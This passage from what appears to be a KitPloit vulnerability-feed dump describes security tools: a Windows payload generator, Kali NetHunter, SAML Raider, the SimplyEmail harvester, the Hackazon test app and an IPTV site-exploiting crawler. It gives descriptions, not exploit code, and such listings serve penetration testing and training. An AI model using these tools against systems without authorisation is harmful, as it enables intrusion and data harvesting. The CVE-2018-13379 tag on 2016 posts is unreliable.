"NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-01-07T23:22:05", "type": "kitploit", "title": "Winpayloads - Undetectable Windows Payload Generation", "bulletinFamily": "tools", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2016-01-07T23:22:05", "id": "KITPLOIT:2686676167278919598", "href": "http://www.kitploit.com/2016/01/winpayloads-undetectable-windows.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-01T07:28:56", "description": "[  ](<https://2.bp.blogspot.com/-5wvqR2_VNZc/Vo2Tbi1cmzI/AAAAAAAAFAM/5Al7o4mPpkQ/s1600/nethunter.png>)\n\n \n\n\n## ** What\u2019s New in Kali NetHunter 3.0 **\n\n \n\n\n### ** NetHunter Android Application Rewrite **\n\n \n\n\nThe NetHunter Android application has been totally redone and has become much more \u201capplication centric\u201d. Many new features and attacks have been added, not to mention a whole bunch of community-driven bug fixes. The NetHunter application has finally reached maturity and is now a really viable tool that helps manage complex attacks. In addition, the application now allows you to manage your Kali chroot independently, including rebuilding and deleting the chroot as needed. You can also choose to install individual metapackages in your chroot, although the default selected kali-nethunter metapackage should include all the bare necessities. \n\n \n\n\n### ** Android Lollipop and Marshmallow Support **\n\n \n\n\nYes, you heard right. NetHunter now supports Marshmallow (Android AOSP 6.x) on applicable devices \u2013 although we\u2019re not necessarily fans of the \u201clatest is best\u201d philosophy. Our favourite device continues to be the OnePlus One phone due to the combined benefits of size, CPU/RAM resources, as well as Y-Cable charging support. \n\n \n\n\n### ** New Build Scripts, Easier Integration for New Devices **\n\n \n\n\nOur rewrite also included the code that generates the images, completely porting it to Python and optimizing the build time significantly. The build process can now build small NetHunter images (~70MB) that do not include a built-in Kali chroot \u2013 allowing you do download a chroot later via the Android application. \n\n \n\n\nWe\u2019ve also made it much easier to build ports for new devices that NetHunter can run on and we\u2019ve already seen a couple of interesting PRs regarding Galaxy device support\u2026 \n\n### \n\n \n\n\n**\n\n** Fabulous NetHunter Documentation **\n\n**\n\n \n\n\nWe might be somewhat biased regarding our documentation, and perhaps it\u2019s not \u201cfabulous\u201d but just \u201cgood\u201d\u2026 but still, it\u2019s definitely much better than it was before and can be found in the form of the NetHunter Github Wiki. We\u2019ve included topics such as downloading, building and installing NetHunter, as well as a quick overview of each of the NetHunter Attacks and Features. \n\n \n\n\n### ** NetHunter Linux Root Toolkit Installer **\n\n \n\n\nWe\u2019ve got a new official NetHunter installer that runs natively on Linux or OSX. The installer is made from a set of Bash scripts which you can use to unlock, flash to stock and install the NetHunter image to supported OnePlus One or Nexus devices. Please welcome the NetHunter LRT, created by jmingov. \n\n \n\n\n \n\n\n** [ Download Kali NetHunter 3.0 ](<https://www.offensive-security.com/kali-linux-nethunter-download/>) **\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-01-06T22:25:44", "type": "kitploit", "title": "Kali NetHunter 3.0 - Android Mobile Penetration Testing Platform", "bulletinFamily": "tools", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2016-01-06T22:25:44", "id": "KITPLOIT:4425790137948714912", "href": "http://www.kitploit.com/2016/01/kali-nethunter-30-android-mobile.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-01T09:22:41", "description": "[  ](<https://3.bp.blogspot.com/-r4AyBrfXG3E/Vo83D2vXPvI/AAAAAAAAFBA/K8lP-y7KJ4Q/s1600/SAML%2BRaider.png>)\n\n \n\n\nSAML Raider is a Burp Suite extension for testing SAML infrastructures. It contains two core functionalities: Manipulating SAML Messages and manage X.509 certificates. \n\n \n\n\nThis software was created by Roland Bischofberger and Emanuel Duss during a bachelor thesis at the [ Hochschule f\u00fcr Technik Rapperswil ](<https://www.hsr.ch/>) (HSR). Our project partner and advisor was [ Compass Security Schweiz AG ](<https://www.csnc.ch/>) . We thank Compass for the nice collaboration and support during our bachelor thesis. \n\n \n** Features ** \nThe extension is divided in two parts. A SAML message editor and a certificate management tool. \n \n** Message Editor ** \nFeatures of the SAML Raider message editor: \n\n\n * Sign SAML Messages \n * Sign SAML Assertions \n * Remove Signatures \n * Edit SAML Message \n * Preview eight common XSW Attacks \n * Execute eight common XSW Attacks \n * Send certificate to SAMl Raider Certificate Management \n * Undo all changes of a SAML Message \n * Supported Profiles: SAML Webbrowser Single Sign-on Profile, Web Services Security SAML Token Profile \n * Supported Bindings: POST Binding, Redirect Binding, SOAP Binding \n \n** Certificate Management ** \nFeatures of the SAML Raider Certificate Management: \n\n\n * Import X.509 certificates (PEM and DER format) \n * Import X.509 certificate chains \n * Export X.509 certificates (PEM format) \n * Delete imported X.509 certificates \n * Display informations of X.509 certificates \n * Import private keys (PKCD#8 in DER format and traditional RSA in PEM Format) \n * Export private keys (traditional RSA Key PEM Format) \n * Cloning X.509 certificates \n * Cloning X.509 certificate chains \n * Create new X.509 certificates \n * Editing and self-sign existing X.509 certificates \n \n** Installation ** \n \n** Manual Installation ** \nStart the Burp Suite and click at the ` Extender ` tab on ` Add ` . Choose the SAML Raider JAR file to install the extension. \n \n** Installation from BApp Store ** \nThe easy way to install SAML Raider is using the BApp Store. Open Burp and click in the ` Extender ` tab on the ` BApp Store ` tab. Select ` SAML Raider ` and hit the ` Install ` button to install our extension. \nDon't forget to rate our extension with as many stars you like. \n \n** Usage ** \nTo test SAML environments more comfortable, you could add a intercept rule in the proxy settings. Add a new rule which checks if a Parameter Name ` SAMLResponse ` is in the request. We hope the usage of our extension is mostly self explaining. \n \n** Development ** \n \n** Build ** \nClone the repository and build the JAR file using Maven: \n\n \n \n $ mvn install \n\nUse the JAR file in ` target/saml-raider-1.0-SNAPSHOT-jar-with-dependencies.jar ` as a Burp extension. \n \n** Run SAML Raider inside Eclipse ** \nTo start the Extension directly from Eclipse, import the Repository into Eclipse. Note that the Eclipse Maven Plugin ` m2e ` is required. \nPlace the Burp Suite JAR file into the ` lib ` folder and add the Burp JAR as a Library in the Eclipse Project ( ` Properties ` \u2192 ` Build Path ` \u2192 ` Libraries ` ). \nOpen the Burp JAR under ` Referenced Libraries ` in the Package Explorer and right click in the Package ` burp ` on ` StartBurp.class ` and select ` Run As... ` \u2192 ` Java Application ` to start Burp and load the Extension automatically. \n \n** Debug Mode ** \nTo enable the Debug Mode, set the ` DEBUG ` Flag in the Class ` Flags ` from the Package ` helpers ` to ` true ` . This will write all output to the ` SAMLRaiderDebug.log ` logfile and load example certificates for testing. \n \n** Test with fake SAML Response ** \nTo send a SAML Response to Burp, you can use the script ` samltest ` in the ` scripts/samltest ` directory. It sends the SAML Response from ` saml_response ` to Burp ( ` localhost:8080 ` ) and prints out the modified response from our plugin. \n\n\n \n \n\n\n** [ Download Samlraider ](<https://github.com/SAMLRaider/SAMLRaider>) **\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-01-09T17:35:02", "type": "kitploit", "title": "SAML Raider - SAML2 Burp Extension", "bulletinFamily": "tools", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2016-01-09T17:35:02", "id": "KITPLOIT:5397133847150975825", "href": "http://www.kitploit.com/2016/01/saml-raider-saml2-burp-extension.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-02T17:24:12", "description": "[  ](<https://3.bp.blogspot.com/-RZkQ0u6vNFg/Vo_nW9taBcI/AAAAAAAAFCo/eZPQT4OgZrk/s1600/simplyemail.png>)\n\n \n\n\nWhat is the simple email recon tool? This tool was based off the work of theHarvester and kind of a port of the functionality. This was just an expansion of what was used to build theHarvester and will incorporate his work but allow users to easily build Modules for the Framework. Which I felt was desperately needed after building my first module for theHarvester. \n\n \n** Scrape EVERYTHING - Simply ** \nCurrent Platforms Supported: \n\n\n * Kali Linux 2.0 \n * Kali Linux 1.0 \nA few small benefits: \n\n\n * Easy for you to write modules (All you need is 1 required Class option and you're up and running) \n * Use the built in Parsers for most raw results \n * Multiprocessing Queue for modules and Result Queue for easy handling of Email data \n * Simple intergration of theHarvester Modules and new ones to come \n * Also the ability to change major settings fast without diving into the code \nAPI Based Searches: \n\n\n * When API based searches become avaliable, no need to add them to the Command line \n * API keys will be auto pulled from the SimpleEmail.ini, this will activate the module for use \n \n** Get Started ** \nPlease RUN the simple Setup Bash script!!! \n\n \n \n [email\u00a0protected]:~/Desktop/SimplyEmail# sh Setup.sh\n or\n [email\u00a0protected]:~/Desktop/SimplyEmail# ./Setup.sh\n\n \n** Standard Help ** \n\n \n \n ============================================================\n Curent Version: 0.5 | Website: CyberSyndicates.com\n ============================================================\n Twitter: @real_slacker007 | Twitter: @Killswitch_gui\n ============================================================\n ------------------------------------------------------------\n ______ ________ __ __\n / \\/ | / / |\n /$$$$$$ $$$$$$$$/ _____ ____ ______ $$/$$ |\n $$ \\__$$/$$ |__ / \\/ \\ / \\/ $$ |\n $$ \\$$ | $$$$$$ $$$$ |$$$$$$ $$ $$ |\n $$$$$$ $$$$$/ $$ | $$ | $$ |/ $$ $$ $$ |\n / \\__$$ $$ |_____$$ | $$ | $$ /$$$$$$$ $$ $$ |\n $$ $$/$$ $$ | $$ | $$ $$ $$ $$ $$ |\n $$$$$$/ $$$$$$$$/$$/ $$/ $$/ $$$$$$$/$$/$$/\n \n ------------------------------------------------------------\n usage: SimplyEmail.py [-all] [-e company.com] [-l] [-t html / flickr / google]\n [-v]\n \n Email enumeration is a important phase of so many operation that a pen-tester\n or Red Teamer goes through. There are tons of applications that do this but I\n wanted a simple yet effective way to get what Recon-Ng gets and theHarvester\n gets. (You may want to run -h)\n \n optional arguments:\n -all Use all non API methods to obtain Emails\n -e company.com Set required email addr user, ex [email\u00a0protected]\n -l List the current Modules Loaded\n -t html / flickr / google\n Test individual module (For Linting)\n -v Set this switch for verbose output of modules\n\n \n** Run SimplyEmail ** \nLet's say your target is cybersyndicates.com \n\n \n \n ./SimplyEmail.py -all -e cybersyndicates.com or in verbose ./SimplyEmail.py -all -v -e cybersyndicates.com\n\nThis will run ALL modules that are have API Key placed in the SimpleEmail.ini file and will run all non-API based modules. \n \n** List Modules SimpleEmail ** \n\n \n \n [email\u00a0protected]:~/Desktop/SimplyEmail# ./SimplyEmail.py -l\n \n ============================================================\n Curent Version: 0.5 | Website: CyberSyndicates.com\n ============================================================\n Twitter: @real_slacker007 | Twitter: @Killswitch_gui\n ============================================================\n ------------------------------------------------------------\n ______ ________ __ __\n / \\/ | / / |\n /$$$$$$ $$$$$$$$/ _____ ____ ______ $$/$$ |\n $$ \\__$$/$$ |__ / \\/ \\ / \\/ $$ |\n $$ \\$$ | $$$$$$ $$$$ |$$$$$$ $$ $$ |\n $$$$$$ $$$$$/ $$ | $$ | $$ |/ $$ $$ $$ |\n / \\__$$ $$ |_____$$ | $$ | $$ /$$$$$$$ $$ $$ |\n $$ $$/$$ $$ | $$ | $$ $$ $$ $$ $$ |\n $$$$$$/ $$$$$$$$/$$/ $$/ $$/ $$$$$$$/$$/$$/\n \n ------------------------------------------------------------\n [*] Available Modules are:\n \n 1) Modules/GooglePDFSearch.py\n 2) Modules/HtmlScrape.py \n 3) Modules/GitHubUserSearch.py\n 4) Modules/Whoisolgy.py \n 5) Modules/CanaryBinSearch.py\n 6) Modules/YahooSearch.py \n 7) Modules/GitHubCodeSearch.py\n 8) Modules/OnionStagram.py \n 9) Modules/AskSearch.py \n 10) Modules/EmailHunter.py \n 11) Modules/WhoisAPISearch.py\n 12) Modules/SearchPGP.py \n 13) Modules/GoogleSearch.py \n 14) Modules/GitHubGistSearch.py\n 15) Modules/RedditPostSearch.py\n 16) Modules/FlickrSearch.py \n \n\n \n** Understanding Reporting Options: ** \nOne of the most frustrating aspects of Pen-testing is the tools' ability to report the findings and make those easily readable. This may be for the data provided to a customer or just the ability to report on source of the data. \nSo I'm making it my goal for my tools to take that work off your back and make it as simple as possible! Let's cover the two different reports generated. \n \n** Text Output: ** \nWith this option results are generated and appended to a running text file called Email_List.txt. this makes it easy to find past searches or export to tool of choice. Example: \n\n \n \n ----------------------------------\n Email Recon: 11/11/2015 05:13:32\n ----------------------------------\n [email\u00a0protected]\n [email\u00a0protected]\n [email\u00a0protected]\n [email\u00a0protected]\n [email\u00a0protected]\n ----------------------------------\n Email Recon: 11/11/2015 05:15:42\n ----------------------------------\n [email\u00a0protected]\n [email\u00a0protected]\n [email\u00a0protected]\n [email\u00a0protected]\n [email\u00a0protected]\n\n \n** HTML Output: ** \nAs I mentioned before a powerful function that I wanted to integrate was the ability to produce a visually appealing and rich report for the user and potentially something that could be part of data provided to a client. Please let me know with suggestions! \n \n** Email Source: ** \n\n\n[  ](<https://4.bp.blogspot.com/-mOM_PuB0umc/Vo_mBPeNsiI/AAAAAAAAFCU/Wx5KDOrGUWU/s1600/email_Screen%2BShot%2B2015-11-11%2Bat%2B5.27.15%2BPM.png>)\n\n \n \n** Email Section: ** \n\n\n * Html report now shows Alerts for Canary Search Results! \n\n[  ](<https://2.bp.blogspot.com/-hMB8ilHs1Ww/Vo_mHl5XW4I/AAAAAAAAFCc/Uc37VqvViHI/s1600/email_Screen%2BShot%2B2015-11-11%2Bat%2B5.27.31%2BPM.png>)\n\n \n \n** Current Email Evasion Techniques ** \n\n\n * The following will be built into the Parser Soon: \n * shinichiro.hamaji _ at _ gmail.com \n * shinichiro.hamaji _ AT _ gmail.com \n * simohayha.bobo at gmail.com \n * \"jeffreytgilbert\" => \"gmail.com\" \n * felix021 # gmail.com \n * hirokidaichi[at]gmail.com \n * hirokidaichi[@]gmail.com \n * hirokidaichi[#]gmail.com \n * xaicron{ at }gmail.com \n * xaicron{at}gmail.com \n * xaicron{@}gmail.com \n * xaicron(@)gmail.com \n * xaicron + gmail.com \n * xaicron ++ gmail.com \n * xaicron ## gmail.com \n * bekt17[@]gmail.com \n * billy3321 -AT- gmail.com \n * billy3321[AT]gmail.com \n * ybenjo.repose [[[at]]] gmail.com \n * sudhindra.r.rao (at) gmail.com \n * sudhindra.r.rao nospam gmail.com \n * shinichiro.hamaji (.) gmail.com \n * shinichiro.hamaji--at--gmail.com \n \n** Build Log: ** \n \n** Changelog (Current v0.6): ** \n\n \n \n ===================================\n Framework Improvements v0.7:\n -----------------------------\n (x) Add unicode / UT8 Decoding to the parser options\n (x) Added Version Check\n \n Modules Added in v0.7\n -----------------------------\n (x) Google Docx Search\n \n Issues Fixed in v0.7:\n -----------------------------\n (x) Fixed issues with Except statement in a few modules\n (x) Fixed Case Mathcing Issues with target Domain\n \n ===================================\n Modules Added in v0.6\n -----------------------------\n (x) Google Doc Search\n (x) Google Xlsx Search\n \n ===================================\n Modules Added in v0.5\n -----------------------------\n (x) Reddit Post Search added\n (x) Google PDF search\n \n ===================================\n Modules Added in v0.4\n -----------------------------\n (x) GitHubUser added\n \n Issues Fixed in v0.4:\n -----------------------------\n (x) Setup File Fix\n (x) issues with strip in Html\n \n Framework Improvements v0.4:\n -----------------------------\n (x) Added Source of email collection\n to final report in bootstrap.\n (x) Added Verbose options for Modules\n to handle Vebose printing.\n (x) Added Alerts to HTML report\n when emails are gathered from canary.\n \n ===================================\n Modules Added in v0.3:\n -----------------------------\n (x) OnionStagram (Instagram User Search)\n (x) AskSearch - Port from theHarvester\n \n Issues Fixed in v0.3:\n ----------------------------\n (x) Added Parser to GitHubCode Search\n (x) Moved wget to 2 sec timeout\n \n ===================================\n Modules Added in v0.2:\n -----------------------------\n (x) EmailHunter Trial API\n \n Issues Fixed in v0.2:\n -----------------------------\n (x) Fixed Issues with SetupScript \n (x) Changes Output Text file name\n \n ===================================\n Modules Added in v0.1:\n -----------------------------\n (x) HtmlScrape Added to Modules \n (x) SearchPGP Added to Modules - Port form theHarvester\n (x) Google Search - Port form theHarvester\n (x) Flickr Page Search\n (x) GitHub Code Search\n (x) GitHubGist Code Search\n (x) Whois Non-Auth API Search\n (x) Whoisology Search\n (x) Yahoo Search - Port from theHarvester\n (x) Canary (Non-API) PasteBin Search for Past Data Dumps!\n \n Issues Fixed in v0.1:\n -----------------------------\n (x) Wget fails to follow redirects in some cases\n (x) Fixed Issues with google search\n (x) Major change with how the Framework Handles Consumer and Producred Model\n (x) Fix Issues with Join() and Conducter\n \n Imprrovements in v0.1:\n -----------------------------\n (x) Added in valid UserAgents and headers\n (x) HTML Scrape now has opption to save or remove is mirror\n (x) HTML Scrape UTF-8 issues fixed\n\n \n** Build out Path: ** \n\n \n \n Modules Under Dev:\n -----------------------------\n ( ) StartPage Search (can help with captcha issues)\n ( ) Searching SEC Data\n ( ) Exalead Search - Port from theHarvester\n ( ) PwnBin Search \n ( ) PasteBin Searches \n ( ) Past Data Dumps\n ( ) psbdmp API Based and non Alert\n \n Framework Under Dev:\n -----------------------------\n ( ) New Parsers to clean results\n ( ) Fix import errors with Glob\n ( ) Add in \"[@]something.com\" to search Regex and engines\n ( ) Add errors for Captcha limit's\n ( ) Add Threading/Multi to GitHub Search\n ( ) Add Source of collection to HTML Output\n\n \n \n\n\n** [ Download SimplyEmail ](<https://github.com/killswitch-GUI/SimplyEmail>) **\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-01-15T21:30:04", "type": "kitploit", "title": "SimplyEmail - Email Recon Made Fast And Easy, With A Framework To Build On", "bulletinFamily": "tools", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2016-01-15T21:30:04", "id": "KITPLOIT:3532211766929466258", "href": "http://www.kitploit.com/2016/01/simplyemail-email-recon-made-fast-and.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-01T07:29:35", "description": "[  ](<https://3.bp.blogspot.com/-eSiFhUj-buk/Vo9FG4IBH1I/AAAAAAAAFBQ/ONPScxDbINU/s1600/Hackazon.png>)\n\n \n \n\n\nHackazon is a free, vulnerable test site that is an online storefront built with the same technologies used in today\u2019s rich client and mobile applications. Hackazon has an AJAX interface, strict workflows and RESTful API\u2019s used by a companion mobile app providing uniquely-effective training and testing ground for IT security professionals. And, it\u2019s full of your favorite vulnerabilities like SQL Injection, cross-site scripting and so on. \n\n \n\n\nToday\u2019s web and mobile applications as well as web services have a host of new technologies that are not being adequately tested for security vulnerabilities. It is critical for IT security professionals to have a vulnerable web application to use for testing the effectiveness of their tools and for honing their skills. \n\n \n\n\nHackazon enables users to configure each area of the application in order to change the vulnerability landscape to prevent \u201cknown vuln testing\u201d or any other form of \u2018cheating.\u2019 Since the application includes RESTful interfaces that power AJAX functionality and mobile clients (JSON, XML, GwT, and AMF), users will need to the latest application security testing tools and techniques to discover all the vulnerabilities. Hackazon also requires detailed testing of strict workflows, like shopping carts,that are commonly used in business applications. to the latest application security testing tools and techniques to discover all the vulnerabilities. Hackazon also requires detailed testing of strict workflows, like shopping carts,that are commonly used in business applications. \n\n \n** Features ** \n\n\n * REST Support - [ http://www.w3.org/2001/sw/wiki/REST ](<https://www.w3.org/2001/sw/wiki/REST>)\n * GWT Support - [ http://www.gwtproject.org ](<http://www.gwtproject.org/>)\n * AJAX and Standard HTTP Requests are Supported \n \n** Technical Details ** \n\n\n * PHP Version \u2013 5.4 \n * PHP Framework \u2013 [ http://phpixie.com/ ](<http://phpixie.com/>)\n * JS \u2013 [ http://jquery.com/ ](<https://jquery.com/>) & [ http://knockoutjs.com/ ](<http://knockoutjs.com/>)\n * CSS \u2013 [ http://getbootstrap.com/ ](<https://getbootstrap.com/>)\n * DB \u2013 MySQL 5.5 with InnoDB Support \n * Web Server \u2013 Apache 2.0 \n \n** Additional Information ** \n\n\n * [ Wiki ](<https://github.com/rapid7/hackazon/wiki>)\n * CyberSecology Blog: [ Hackazon Test Site Review ](<http://cybersecology.com/hackazon-review/>)\n \n** Installation ** \n\n\n 1. Checkout the code \n 2. Set DOCUMENT_ROOT directory to /web. Make sure that htaccess and REWRITE support is enabled. \n 3. Copy /assets/config/db.sample.php to /assets/config/db.php \n 4. Change settings for DB connection in the /assets/config/db.php \n 5. Open http://yoursitename/install \n** Code structure: ** \n\n\n * ROOT \n * assets \n * classes \n * database \n * modules \n * vendor \n * web \n\n** [ Download Hackazon ](<https://github.com/rapid7/hackazon>) **\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-01-10T20:30:13", "type": "kitploit", "title": "Hackazon - A Modern Vulnerable Web App", "bulletinFamily": "tools", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2016-01-10T20:30:13", "id": "KITPLOIT:6516544912632048506", "href": "http://www.kitploit.com/2016/01/hackazon-modern-vulnerable-web-app.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-01T21:30:07", "description": "[  ](<https://2.bp.blogspot.com/-VXHs81ajz9A/VoxFmw_g60I/AAAAAAAAE_s/ZTfhBbOcSgk/s1600/%255DIPTV.jpg>)\n\n \n \n\n\nThis program is just a demonstration. DO NOT USE IT FOR PERSONAL purpose \n\n \n\n\n** What is this? **\n\n \n\n\nIPTV is a simple python script that let you crawl the search engines in order to fetch those sites that stream illegal tv programs. \n\n \n\n\nThis script leverage the fact the a lot of those sites use the same CMS to create the web application and sharing the service, behind a CMS there's always some exploits. We are using one simple exploit to grab and crawl the site's url and use for our purpose. \n\n \n** Ethical Dilemma ** \n \nEven though those services are illegal, stealing from a thief is still stealing. \n \n** External dependencies ** \n \nIf you want to use the ` iptv_gui ` version you need to install ` PyQt ` first \n\n\n * On Linux you can simply search it from your preferred package manager, for example on Ubuntu/Debian ` sudo apt-get install pyqt4-dev-tools `\n * On Mac OSX you can use _ brew _ to install it ` brew install sip ` && ` brew install pyqt `\n * On Windows yu can download the official .exe from the PyQt site. \n \n** How to use the CLI version ** \n\n\n * Clone the repository ` git clone https://github.com/Pinperepette/IPTV `\n * ` cd ` into ` iptv `\n * run ` pip install -r requirements.txt ` in order to get the full dependencies \n * run ` python iptv_cli.py `\n * Use the application menu to do stuff \n \n** How to use the GUI version ** \n\n\n * Clone the repository ` git clone [email protected] :Pinperepette/IPTV.git `\n * ` cd ` into ` iptv `\n * run ` pip install -r requirements.txt ` in order to get the full dependencies \n * run ` python iptv_gui.py `\n * you can see an example of the GUI in the image below \n \n \n** Compatibility ** \n \nThis program work on Window, Linux, Mac OSX and BSD. The only requirement is python, better if python 3! \n \n \n\n\n** [ Download IPTV Brute-Force ](<https://github.com/Pinperepette/IPTV>) **\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-01-05T22:40:17", "type": "kitploit", "title": "IPTV Brute-Force - Search And Brute Force Illegal IPTV Server", "bulletinFamily": "tools", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2016-01-05T22:40:17", "id": "KITPLOIT:5376485594298165648", "href": "http://www.kitploit.com/2016/01/iptv-brute-force-search-and-brute-force.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-04-13T13:32:25", "description": "[](<https://blogger.googleusercontent.com/img/a/AVvXsEjoizJNl3LNYyyv9myMlsuI7gmP1E7MSM6weEMAwhxbOF9kmr-8waHDsvhRb2xdofgiYS6isSrf5JoaxaNA87i5DrBemJD6-WcYfcskbfGvG4MpCmR9POqdxJXSONqdrj2wqvFxph_mGP-aGyijgmGsohQIlkulxCW6J_W-raQ7iD_dq8KnkAGkhG1H>)\n\n \n\n\n# Melody\n\nMonitor the Internet's background noise\n\nMelody is a transparent internet sensor built for [threat intelligence](<https://www.kitploit.com/search/label/Threat%20Intelligence> \"threat intelligence\" ) and supported by a detection rule framework which allows you to tag packets of interest for further analysis and threat monitoring.\n\n \n\n\n# Features\n\nHere are some key features of Melody :\n\n * Transparent capture\n * Write detection rules and tag specific packets to analyze them at scale\n * Mock [vulnerable](<https://www.kitploit.com/search/label/Vulnerable> \"vulnerable\" ) websites using the builtin HTTP/S server\n * Supports the main internet protocols over IPv4 and IPv6\n * Handles log rotation for you : Melody is designed to run forever on the smallest VPS\n * Minimal configuration required\n * Standalone mode : configure Melody using only the CLI\n * Easily scalable : \n * Statically compiled binary\n * Up-to-date Docker image\n\n# Wishlist\n\nSince I have to focus on other projects right now, I can't put much time in Melody's development.\n\nThere is a lot of rom for improvement though, so here are some features that I'd like to implement someday :\n\n * ~~Dedicated helper program to create, test and manage rules~~ -> Check Meloctl in `cmd/meloctl`\n * Centralized rules management\n * Per port 